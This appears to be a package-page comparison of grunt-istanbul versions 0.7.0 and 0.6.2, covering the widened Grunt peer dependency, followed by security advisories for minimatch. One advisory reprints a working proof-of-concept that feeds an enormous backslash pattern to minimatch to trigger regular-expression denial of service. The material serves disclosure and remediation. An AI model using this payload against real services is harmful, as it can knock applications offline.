Grunt-istanbul is a Grunt plugin designed for JavaScript code coverage analysis, streamlining the integration of Istanbul, a popular JavaScript code coverage tool, into Grunt-based workflows. Comparing version 0.7.0 with the previous stable version 0.6.2 reveals subtle but potentially impactful changes for developers. Both versions share core dependencies like chalk, istanbul, and nue, ensuring consistent functionality for tasks such as report styling and asynchronous execution. Similarly, development dependencies including testing frameworks (grunt-contrib-nodeunit), linting tools (grunt-contrib-jshint), and utility libraries like mkdirp and rimraf remain consistent, suggesting a focus on maintaining existing codebase quality.
The key difference lies in the peerDependencies. Version 0.6.2 specifies grunt: "~0.4.5" as a peer dependency, while version 0.7.0 changes this to grunt: ">=0.4.0". While seemingly minor, this broadening of the supported Grunt versions indicates an effort to enhance compatibility. Developers using older Grunt versions (0.4.0 to 0.4.4) who previously couldn't leverage grunt-istanbul 0.6.2, can now utilize version 0.7.0. This improved compatibility reduces friction for developers working on diverse projects with varying Grunt version requirements, making Grunt-istanbul more accessible without mandating immediate Grunt upgrades. This ensures wider adoption of the library and simplifies integration, allowing developers to easily incorporate code coverage into their Grunt-driven build processes. The release date difference also highlights that version 0.7.0 is a more recent iteration including the latest bug fixes and enhancements.
All the vulnerabilities related to the version 0.7.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.